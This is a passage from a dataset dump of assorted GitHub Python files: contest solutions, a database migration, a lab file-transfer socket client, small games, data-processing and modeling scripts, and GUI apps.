len(inputs):\r\n a, b=inputs[i].replace('\\r','').replace('\\n','').strip().split()\r\n a = int(a)\r\n b = int(b)\r\n \r\n i+=1\r\n result += 'Case #%d: ' %count + str(test(a,b)) + '\\r\\n'\r\n count += 1\r\n\r\nf=open(outputFile,'wb')\r\nf.write(result)\r\nf.close()\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1849.py","file_name":"1849.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12421189633","text":"\"\"\"empty message\n\nRevision ID: a6ab2a579b5e\nRevises: fd781ba359c8\nCreate Date: 2022-07-15 01:53:43.771252\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6ab2a579b5e'\ndown_revision = 'fd781ba359c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('stocks_id', sa.Integer(), nullable=True),\n sa.Column('services_required', sa.String(length=50), nullable=True),\n sa.Column('customer_company', sa.String(length=50), nullable=True),\n sa.Column('customer_poc_name', sa.String(length=50), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['stocks_id'], ['stock_list.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_projects_timestamp'), 'projects', ['timestamp'], unique=False)\n op.add_column('stock_list', sa.Column('quantity', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stock_list', 'quantity')\n op.drop_index(op.f('ix_projects_timestamp'), table_name='projects')\n op.drop_table('projects')\n # ### end Alembic commands ###\n","repo_name":"healthier-vitamins/workflow-management-backend","sub_path":"migrations/versions/a6ab2a579b5e_.py","file_name":"a6ab2a579b5e_.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41371647518","text":"import socket\nimport os\nimport time\n\n#create socket\ns = socket.socket()\n\n\nport = 8880\n\n#connect to server\ns.connect(('192.168.114.6',port))\n\n#File to be sent\nfile_name = input(\"[+]File name:\")\nfile_size = os.path.getsize(file_name)\n\n#Send file to server\ns.send(file_name.encode())\ns.send(str(file_size).encode())\n\n# Open and read file\nwith open(file_name,\"rb\") as file:\n\n\tc = 0\n\n\t#Start time record\n\tstart_time = time.time()\n\n\t#loop for sent the file\n\twhile c <= file_size:\n\t\tdata1 = file.read(1024)\n\t\tif not (data1):\n\t\t\tbreak\n\t\ts.sendall(data1)\n\t\tc = c + len(data1)\n\n\t#end time record\n\tend_time = time.time()\n\n\nprint(\"[+] File transfer to server complete! Total time: \",end_time - start_time)\n\n#close socket\ns.close() \n\ns.close()\n","repo_name":"skyclimberxx/ITT440-LAB5","sub_path":"Client5.4.py","file_name":"Client5.4.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31968938056","text":"import pygame\n\n\nclass Ship:\n \"\"\"Class to manage space ship\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"init space ship and start location\"\"\"\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n self.screen_rect = ai_game.screen.get_rect()\n\n # Load ship image\n self.image = pygame.image.load('ship.bmp')\n self.rect = self.image.get_rect()\n\n # New ship start at the bottom of screen\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Ship location\n self.x = float(self.rect.x)\n\n # Check if ship is moving\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"Update ship location based on move\"\"\"\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.x += self.settings.ship_speed\n if self.moving_left and self.rect.left > 0:\n self.x -= self.settings.ship_speed\n\n # Update ship location x\n self.rect.x = self.x\n\n def blitme(self):\n \"\"\"Display ship in actual position\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"move ship to mid bottom scren\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n","repo_name":"filipAnt/alien_invasion","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41173273400","text":"#Challenge: Given an array arr of N integers. Find the contiguous sub-array \n# with maximum sum.\n\n#Idea: A contiguous subarray is the maximum if:\n# (1) Sum is positive and no smaller contiguous subarrays in the sum's \n# subarray have a negative sum OR\n# (2) Sum is negative and no contiguous subarrays have sum is positve\n# Count the sum from left to right. If sum becomes negative, restart count.\n\ndef subarrayWithMaxSum(numbers):\n max_sum = None\n count = 0\n for number in numbers:\n count += number\n if max_sum is None or max_sum < count:\n max_sum = count\n if count < 0:\n count = 0\n return max_sum\n\nif __name__ == '__main__':\n assert subarrayWithMaxSum([1,2,3,-2,5]) == 9\n assert subarrayWithMaxSum([-1,-2,-3,-4]) == -1\n","repo_name":"edenuis/Python","sub_path":"Code Challenges/subarrayWithMaxSum.py","file_name":"subarrayWithMaxSum.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23876258673","text":"from machine import ADC, Pin\nimport time\n\npotentiometer = ADC(Pin(27))\n\nred = Pin(18, Pin.OUT)\namber = Pin(19, Pin.OUT)\ngreen = Pin(20, Pin.OUT)\nall_leds = [red, amber, green]\n\n\ndef set_all(leds_to_set, to_set, delay=None, reverse_order=False):\n if reverse_order:\n leds_to_set = reversed(leds_to_set)\n\n for led in leds_to_set:\n led.value(to_set)\n if delay:\n time.sleep(delay)\n\n\ndef blink(leds_to_blink, blink_duration=0.5, delay=None, alternate=False):\n set_all(leds_to_blink, 1, delay=delay)\n time.sleep(blink_duration)\n\n set_all(leds_to_blink, 0, delay=delay, reverse_order=alternate)\n time.sleep(blink_duration)\n\n\nknob_percentage = 0\nwhile True:\n knob_percentage = potentiometer.read_u16() / 65000\n if knob_percentage < 0.1:\n set_all(all_leds, 0)\n elif knob_percentage < 0.34:\n set_all([red], 1)\n set_all([amber, green], 0)\n elif knob_percentage < 0.67:\n set_all([red, amber], 1)\n set_all([green], 0)\n elif knob_percentage < 0.99:\n set_all(all_leds, 1)\n else:\n blink(all_leds)\n","repo_name":"WalternativE/maker_advent_calendar","sub_path":"twelve_days_of_pi/day_04_gauge.py","file_name":"day_04_gauge.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3348220448","text":"from time import strptime, mktime\n\nfrom datetime import datetime\n\nfrom kwod_webapp.database.models import ECGRecording\n\n\nclass HeaderParser(object):\n def __init__(self):\n pass\n\n def parse_header(self, header_url):\n with open(header_url, 'r') as f:\n first_line = f.readline()\n tokens = first_line.split()\n\n plot_count = int(tokens[1])\n\n comment_lines = []\n\n while True:\n line = f.readline()\n if not line:\n break\n elif line.startswith(\"#\"):\n comment_lines.append(line[1:])\n\n return ECGRecording(\n name=tokens[0],\n timestamp=None,\n url=header_url.replace(\".hea\", \".dat\"),\n plot_count=plot_count,\n frequency=int(tokens[2]),\n sample_count=int(tokens[3]),\n comment='\\n'.join(comment_lines)\n )\n","repo_name":"karaleina/kwod","sub_path":"kwod_webapp/parsers/header_parser.py","file_name":"header_parser.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19227879489","text":"import os\nimport uuid\nfrom classes.Customer import Customer\nfrom classes.ParentModel import ParentModel\nfrom utils.consts import ROOT_PATH, CUSTOMERS_FILE\n\n\nclass CustomerModel(ParentModel):\n customers = []\n\n def load_customers(self):\n file = self.__open_file(\"r\")\n self.customers = []\n if (file):\n for customer in file:\n customer = customer.rstrip(\"\\n\").split(\",\")\n customer_to_save = Customer(\n customer[0], customer[1], customer[2], customer[3], customer[4])\n self.__save_customer_to_list(customer_to_save)\n file.close()\n\n def get_customers(self):\n return self.customers\n\n def save(self, customer: Customer) -> bool:\n file = self.__open_file(\"a\")\n customer.id = uuid.uuid4()\n if (file):\n file.write(\n f\"{customer.id},{customer.name},{customer.address},{customer.phone},{customer.nit}\\n\")\n file.close()\n self.__save_customer_to_list(customer)\n return True\n\n return False\n\n def update(self, customer: Customer) -> bool:\n is_updated = self.__update_in_file(customer)\n if (is_updated):\n index = self.get_element_index(customer, self.customers)\n if (index != None):\n self.customers[index].name = customer.name\n self.customers[index].address = customer.address\n self.customers[index].phone = customer.phone\n self.customers[index].nit = customer.nit\n return is_updated\n\n def delete(self, customer: Customer):\n print(\"id\", customer.id)\n is_deleted = self.__delete_in_file(customer)\n if (is_deleted):\n self.customers.remove(customer)\n\n return is_deleted\n\n def __save_customer_to_list(self, customer: Customer):\n self.customers.append(customer)\n\n def __open_file(self, open_mode: str):\n try:\n file = open(os.path.abspath(\n f\"{ROOT_PATH}\\{CUSTOMERS_FILE}\"), mode=open_mode, encoding=\"utf-8\")\n return file\n except FileNotFoundError:\n print(f\"Sorry, the file {CUSTOMERS_FILE} does not exist.\")\n return None\n\n def __delete_in_file(self, customer: Customer):\n read_file = self.__open_file(\"r\")\n if read_file:\n lines = read_file.readlines()\n read_file.close()\n updated_lines = [\n line for line in lines if not line.startswith(str(customer.id))]\n write_file = self.__open_file(\"w\")\n write_file.writelines(updated_lines)\n write_file.close()\n return True\n return False\n\n def __update_in_file(self, customer: Customer):\n read_file = self.__open_file(\"r\")\n if read_file:\n lines = read_file.readlines()\n read_file.close()\n index = self.get_element_index_in_file(customer, lines)\n lines[index] = f\"{customer.id},{customer.name},{customer.address},{customer.phone},{customer.nit}\\n\"\n write_file = self.__open_file(\"w\")\n write_file.writelines(lines)\n write_file.close()\n return True\n return False\n","repo_name":"OzkrMonroy/py_store_manager","sub_path":"models/CustomerModel.py","file_name":"CustomerModel.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34900354740","text":"test_inputs = [\n \"inputs/day23\"\n]\n\n\nclass Node:\n def __init__(self, value, nxt=None):\n self.v = value\n self.n = nxt\n\n\ndef step(cups):\n index_map = {}\n for idx, val in enumerate(cups):\n index_map[val] = idx\n\n current = cups[0]\n to_move = cups[1:4]\n destination = current - 1\n if destination == 0:\n destination = len(cups)\n while destination in to_move:\n destination = (destination - 1)\n if destination == 0:\n destination = len(cups)\n\n destination_idx = index_map[destination]\n next_cups = []\n for idx in range(4, len(cups)):\n next_cups.append(cups[idx])\n if idx == destination_idx:\n next_cups += to_move\n next_cups.append(current)\n return next_cups\n\n\ndef step2(node_map, cur, size):\n cur_node = node_map[cur]\n first_to_move = cur_node.n\n last_to_move = cur_node.n.n.n\n move_values = {cur_node.n.v, cur_node.n.n.v, cur_node.n.n.n.v}\n dest = cur_node.v\n while True:\n dest = dest - 1\n if dest == 0:\n dest = size\n if dest not in move_values:\n break\n dest_node = node_map[dest]\n\n cur_node.n = last_to_move.n\n tmp = dest_node.n\n dest_node.n = first_to_move\n last_to_move.n = tmp\n return cur_node.n.v\n\n\ndef process(path):\n print(\"Input:\", path)\n\n with open(path) as f:\n for line in f:\n cups = [int(c) for c in line.strip()]\n node_map = {}\n prev = None\n for cup in cups + list(range(len(cups) + 1, 10 ** 6 + 1)):\n node_map[cup] = Node(cup)\n if prev:\n prev.n = node_map[cup]\n prev = node_map[cup]\n prev.n = node_map[cups[0]]\n\n cur = cups[0]\n for x in range(10 ** 7):\n cur = step2(node_map, cur, 10 ** 6)\n\n one_node = node_map[1]\n print(one_node.n.v * one_node.n.n.v)\n\n\ndef main():\n for path in test_inputs:\n process(path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"will-snavely/adventofcode","sub_path":"aoc2020/day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40608868358","text":"#-*-coding: utf-8-*-\n#!/bin/sh\n\n'''\n# @file\t\tthe easymake-yaml script written by python3\n# @date \t2020-06\n# @author\tStephen-Zhang(github.com/stark-zhang)\n# @lic\t\tMIT and all right reserved\n'''\n\nimport yaml as yml\nfrom pathlib import Path as path\nfrom getopt import gnu_getopt\nimport sys, os, re\n\n'''\n# @brief\tsome variables\n'''\noptions = [\n\t\t'f:o:cb:e:nh?v',\n\t\t['file=', 'output=', 'check-complier', 'build=', 'exec=', 'just-print', 'help', 'version'],\n]\n\nversion = '0.0.1-alpha'\n\n'''\n# @brief\tExceptions while processing easymake configuration\n'''\nclass EasyMakeBaseException(Exception):\n\t'''\n\tThe basic exception class for easymake-yaml\n\t'''\n\tdef __init__(self, excep_no: int, details: str):\n\t\tself.details = details\n\t\tself.excep_no = excep_no\n\n\tdef format(self, excep_name: str) -> str:\n\t\treturn excep_name + ': '+ str(self.excep_no) + ', ' + self.details\n\nclass TemporaryDirException(EasyMakeBaseException):\n\t# the error about temporary folder\n\tdef __repr__(self):\n\t\treturn self.format('TemporaryDirException')\n\nclass DefaultConfigNotExistException(EasyMakeBaseException):\n\t'''\n\twill be raised when cannot find default configuration files\n\t'''\n\tdef __repr__(self):\n\t\treturn self.format('DefaultConfigNotExistException')\n\nclass CommandStringIllegalException(EasyMakeBaseException):\n\t'''\n\twill be raised when compiler deduced failed\n\t'''\n\tdef __repr__(self):\n\t\treturn self.format('CommandStringIllegalException')\n\nclass default_complier:\n\t'''\n\tA class to store information of property \"compiler\"\n\t'''\n\tclass command:\n\t\t'''\n\t\tA sub-class to store sub-property 'command'\n\t\t'''\n\t\tdef __init__(self):\n\t\t\t'''\n\t\t\tdefault value from GNU Compiler Collections(gcc.gnu.org)\n\t\t\t'''\n\t\t\tself.cc = 'gcc'\n\t\t\tself.cxx = 'g++'\n\t\t\tself.ar = 'ar'\n\n\t\tdef cc_praser(self, property: str, value: str):\n\t\t\t'''\n\t\t\tuse one of sub-property(cc, cxx, ar) to deduce others command, via regex\n\t\t\tdo not deduce other commands from ar\n\t\t\t'''\n\t\t\t# the real filename of command may be started with '/' and must be ended without '/'.\n\t\t\t# so we can use this rule to find where the real command is and deduce other commands\n\n\t\t\t# deduce from property 'cc'\n\t\t\tif property == 'cc':\n\t\t\t\tself.cc = value\n\t\t\t\tif 'gcc' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('gcc')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\t# get the correct sub-string which may be start with '/'\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('gcc', 'g++')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('gcc', 'ar')\n\n\t\t\t\t\t\t# replace them, and as same as following processes\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif 'clang' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('clang')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('clang', 'clang++')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('clang', 'llvm-ar')\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif matches is None:\n\t\t\t\t\traise CommandStringIllegalException(11, \"Cannot find value of property \\'%s\\'\" % property)\n\t\t\t\t\n\t\t\t# deduce from property 'cxx'\n\t\t\tif property == 'cxx':\n\t\t\t\tself.cc = value\n\t\t\t\tif 'g++' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('g++')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('g++', 'gcc')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('g++', 'ar')\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif 'clang++' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('clang++')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('clang++', 'clang')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('clang++', 'llvm-ar')\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif matches is None:\n\t\t\t\t\traise CommandStringIllegalException(11, \"Cannot find value of property \\'%s\\'\" % property)\n\n\t\tdef _cc_re_compile(self, command_to_match: str) -> str:\n\t\t\t'''\n\t\t\ta private function to get a regex string\n\t\t\t'''\n\t\t\treturn r'\\/?' + command_to_match + r'((?!\\/).)*$'\n\n\tdef __init__(self):\n\t\tself.command = self.command()\t\t\t# sub-property: command\n\t\tself.flags = None\t\t\t\t\t\t# sub-property: flags(for C/C++ Compiler)\n\t\tself.cflags = None\t\t\t\t\t\t# sub-property: flags for c compiler\n\t\tself.ccflags = None\t\t\t\t\t\t# sub-property: flags for c++ compiler\n\t\tself.arflags = None\t\t\t\t\t\t# sub-property: flags archive tool\n\t\tself.ldflags = None\t\t\t\t\t\t# sub-property: flags ld\n\t\tself.libpath = None\t\t\t\t\t\t# sub-property: the path to search libraries(-L)\n\t\tself.hpath = None\t\t\t\t\t\t# sub-property: the path to search headers(-i)\n\t\tself.links = None\t\t\t\t\t\t# property in global: the libraries will be linked(-l)\n\t\tself.headers = None\t\t\t\t\t\t# property in global: the headers will be included(-I)\n\n\nclass extra_compiler:\n\t'''\n\tA class to store information of property \"extraCompiler\"\n\t'''\n\tdef __init__(self):\n\t\tpass\n\nclass custom_target:\n\t'''\n\tA class to store information of property \"customTarget\"\n\t'''\n\t# TODO: this class will be defined in the future\n\tpass\n\nclass Makefile:\n\t'''\n\tto receive infomation of yaml praser, and generate Makefile\n\t'''\n\tdef __init__(self):\n\t\tpass\n\n'''\n# @brief\tsome functions\n'''\ndef find_default_configuration() -> str:\n\t'''\t\n\tsearch the default configuration file named or \n\t'''\n\tdefault_config = path('./easymake.yml')\n\n\tif default_config.exists() and default_config.is_file():\n\t\treturn str(default_config)\n\n\tdefault_config = path('./emake.yml')\n\n\tif default_config.exists() and default_config.is_file():\n\t\treturn str(default_config)\n\n\traise DefaultConfigNotExistException(0, \"Error: Cannot find the default configuration\")\n\ndef check_command_exists(os_name: str, command: str) -> bool:\n\t'''\n\tcheck spcified command exists or not in the PATH\n\t'''\n\tif '/' in command or '\\\\' in command:\n\t\t# if '/' or '\\' is in command, it may be in absolute path\n\t\treturn path(command).exists()\n\n\telse:\n\t\t# in MS Windows, the spliter of PATH is ';', in Unix-like, it's ':'\n\t\tpath_spliter = ';' if os_name == 'nt' else ':'\n\n\t\t# and, `.exe` is neccessery suffix of complete command in MS Windows\n\t\tcommand += '.exe' if os_name == 'nt' else ''\n\n\t\t# search command in the PATH\n\t\tfor p in os.environ['PATH'].split(path_spliter):\n\t\t\tif (path(p) / command).exists():\n\t\t\t\treturn True\n\ndef copy_root_structure(output_dir: str):\n\t'''\n\tcopy structure of project root to output directory(the value of property 'int')\n\t'''\n\tpass\n\ndef usage():\n\tprint(\"Usage: %s [OPTIONS]...\" % sys.argv[0])\n\n# Execute this script in shell\nif __name__ == '__main__':\n\ttry:\n\t\t# prase the CLI Options\n\t\topts, args = gnu_getopt(sys.argv[1:], options[0], options[1])\n\n\texcept EasyMakeBaseException as e:\n\t\tprint(repr(e))\n\t\n\texcept Exception as e:\n\t\tprint(repr(e))\n\n# EOF\n","repo_name":"zhang-stephen/easymake-yaml","sub_path":"emake.py","file_name":"emake.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13422057874","text":"from time import sleep\nimport numpy as np\nfrom cvzone.HandTrackingModule import HandDetector\nimport cv2\nimport cvzone\nfrom pynput.keyboard import Controller\n\nkeys = [[\"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\"],\n [\"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \";\"],\n [\"Z\", \"X\", \"C\", \"V\", \"B\", \"N\", \"M\", \",\", \".\", \"/\"]]\nfinalText = \"\"\n\nkeyboard = Controller()\n\n\n# def drawAll(img, buttonList):\n# for button in buttonList:\n# x, y = button.pos\n# w, h = button.size\n# cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n# 20, rt=0)\n# cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)\n# cv2.putText(img, button.text, (x + 20, y + 65),\n# cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n# return img\ndef drawAll(img, buttonList):\n imgNew = np.zeros_like(img, np.uint8)\n for button in buttonList:\n x, y = button.pos\n cvzone.cornerRect(imgNew, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n 20, rt=0)\n cv2.rectangle(imgNew, button.pos, (x + button.size[0], y + button.size[1]),\n (255, 0, 255), cv2.FILLED)\n cv2.putText(imgNew, button.text, (x + 40, y + 60),\n cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 255), 3)\n\n out = img.copy()\n alpha = 0.5\n mask = imgNew.astype(bool)\n print(mask.shape)\n out[mask] = cv2.addWeighted(img, alpha, imgNew, 1 - alpha, 0)[mask]\n return out\n\n\nclass Button:\n def __init__(self, pos, text, size=[85, 85]):\n self.pos = pos\n self.size = size\n self.text = text\n\n\nbuttonList = []\nfor i in range(len(keys)):\n for j, key in enumerate(keys[i]):\n buttonList.append(Button([100 * j + 50, 100 * i + 50], key))\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\ndetector = HandDetector(detectionCon=0.8, maxHands=1)\nwhile True:\n # Get image frame\n success, img = cap.read()\n # Find the hand and its landmarks\n hands, img = detector.findHands(img) # with draw\n # hands = detector.findHands(img, draw=False) # without draw\n\n if hands:\n # Hand 1\n hand1 = hands[0]\n lmList1 = hand1[\"lmList\"] # List of 21 Landmark points\n bbox1 = hand1[\"bbox\"] # Bounding box info x,y,w,h\n centerPoint1 = hand1['center'] # center of the hand cx,cy\n handType1 = hand1[\"type\"] # Handtype Left or Right\n\n fingers1 = detector.fingersUp(hand1)\n if lmList1:\n for button in buttonList:\n x, y = button.pos\n w, h = button.size\n if x < lmList1[8][0] < x + w and y < lmList1[8][1] < y + h:\n cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n l, _ = detector.findDistance(lmList1[8], lmList1[12])\n\n if l < 30:\n keyboard.press(button.text)\n cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n finalText += button.text\n sleep(0.3)\n\n # Display\n cv2.rectangle(img, (50, 350), (700, 450), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, finalText, (60, 430),cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)\n img = drawAll(img, buttonList)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n","repo_name":"ThusharaSampath/virtual_keypad","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73762029314","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split # splitting the data\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier as dtc # tree algorithm\nfrom sklearn.tree import plot_tree # tree diagram\n\ndf=pd.read_csv('data.csv')\n\ndf.head()\n\ndf.count()/len(df)\n\nlen(df[df['converted']==1]) #64076\n\nlen(df) # 919084\n\ndf.columns\n\nX=df[['treatment_name', 'gv_band_a', 'gv_band_b', 'gv_band_c', 'gv_band_d',\n 'weekday', 'was_price_flag', 'discount_band_0_10',\n 'discount_band_10_19', 'discount_band_19_29', 'price_band_0_26',\n 'price_band_26_68', 'price_band_68_149', 'price_band_149_343']]\ny=df['converted']\n\n############ split into training and testing\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) # 70% training and 30% test\n\n############ Logistic Regression\n\nimport imblearn\nfrom imblearn.pipeline import Pipeline\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom collections import Counter\n\n# define undersample strategy\nundersample = RandomUnderSampler(sampling_strategy=0.5)\n\n# fit and apply the transform\nX_over, y_over = undersample.fit_resample(X_train, y_train)\n\n# summarize class distribution\nprint(Counter(y_over))\n\nlr = LogisticRegression()\nlr.fit(X_over, y_over)\n\n# Predicting on the test data\ny_pred_log = lr.predict(X_test)\n\n#Calculating and printing the f1 score\nf1_test_log = metrics.f1_score(y_test, y_pred_log)\nprint('The f1 score for the testing data:', f1_test_log)\n\n# Print the confusion matrix\ny_pred_train = lr.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train, digits=3))\nprint(metrics.confusion_matrix(y_over, y_pred_train))\n\nprint(metrics.confusion_matrix(y_test, y_pred_log))\n\nprint(metrics.classification_report(y_test, y_pred_log, digits=3))\n\n############# Decision Tree\n\n# Create Decision Tree classifier object\nclf = dtc(criterion=\"entropy\", max_depth=5, min_weight_fraction_leaf=0.1, ccp_alpha=0.001)\n\n# Train Decision Tree Classifier\nclf = clf.fit(X_over,y_over)\n\n#Predict the response for test dataset\ny_pred_dt = clf.predict(X_test)\n\nprint('The f1 score for the testing data:', metrics.f1_score(y_test, y_pred_dt))\n\n# Print the confusion matrix\ny_pred_train_clf = clf.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train_clf, digits=3))\nprint(metrics.confusion_matrix(y_over, y_pred_train_clf))\n\nprint(metrics.confusion_matrix(y_test, y_pred_dt))\n\nprint(metrics.classification_report(y_test, y_pred_dt, digits=3))\n\n############## Random Forest\nfrom sklearn.ensemble import RandomForestClassifier\nrf = RandomForestClassifier(max_depth=4, random_state=0)\nrf.fit(X_over, y_over)\n\n#Predict the response for test dataset\ny_pred_rf = rf.predict(X_test)\n\nprint('The f1 score for the testing data:', metrics.f1_score(y_test, y_pred_rf))\n\n# Print the confusion matrix\ny_pred_train_rf = rf.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train_rf, digits=3))\nprint(metrics.confusion_matrix(y_over, y_pred_train_rf))\n\nprint(metrics.confusion_matrix(y_test, y_pred_rf))\n\nprint(metrics.classification_report(y_test, y_pred_rf, digits=5))","repo_name":"KaylaX/kaggle_for_fun","sub_path":"conversion_modeling.py","file_name":"conversion_modeling.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33680474772","text":"import wx\nfrom wx.lib import newevent\nfrom board import Board\nfrom engine import Engine\n\n\nevt_speed_changed, EVT_SPEED = newevent.NewEvent()\n\n\nclass WxRenderer(wx.App):\n def __init__(self):\n self._timer = None\n self._board = None\n self._engine = None\n self._gui = None\n self._speed = 500\n super(WxRenderer, self).__init__(False)\n\n def OnInit(self):\n self._board = Board(30, 30)\n self._engine = Engine(self._board)\n self._gui = MainFrame(self._board)\n self._gui.Show()\n\n self._timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self._iterate, self._timer)\n self.Bind(EVT_SPEED, self._update_speed)\n\n self._init_game_board()\n\n self._timer.Start(self._speed)\n\n return True\n\n def _iterate(self, evt):\n self._engine.step()\n self._gui.Refresh()\n self._timer.Start(self._speed)\n\n def _init_game_board(self):\n #glider\n self._board.get(6, 6).alive = True\n self._board.get(7, 7).alive = True\n self._board.get(7, 8).alive = True\n self._board.get(6, 8).alive = True\n self._board.get(5, 8).alive = True\n\n #blinker\n self._board.get(12, 4).alive = True\n self._board.get(12, 5).alive = True\n self._board.get(12, 6).alive = True\n\n def _update_speed(self, evt):\n self._speed = evt.new_speed\n\n\nclass MainFrame(wx.Frame):\n def __init__(self, board):\n super(MainFrame, self).__init__(None)\n\n panel = GridCtrl(self, board, show_lines=False)\n self.speed_slider = wx.Slider(self, minValue=100, maxValue=1500)\n self.speed_value = wx.StaticText(self, label=\"NA\")\n\n sizer_speed = wx.BoxSizer(wx.HORIZONTAL)\n sizer_speed.Add(self.speed_slider, 1, wx.EXPAND)\n sizer_speed.Add(self.speed_value, 0, wx.EXPAND)\n sizer_main = wx.BoxSizer(wx.VERTICAL)\n sizer_main.Add(sizer_speed, 0, wx.EXPAND)\n sizer_main.Add(panel, 1, wx.EXPAND)\n\n self.SetSizer(sizer_main)\n\n self.Bind(wx.EVT_SLIDER, self._on_slider_changed, self.speed_slider)\n\n 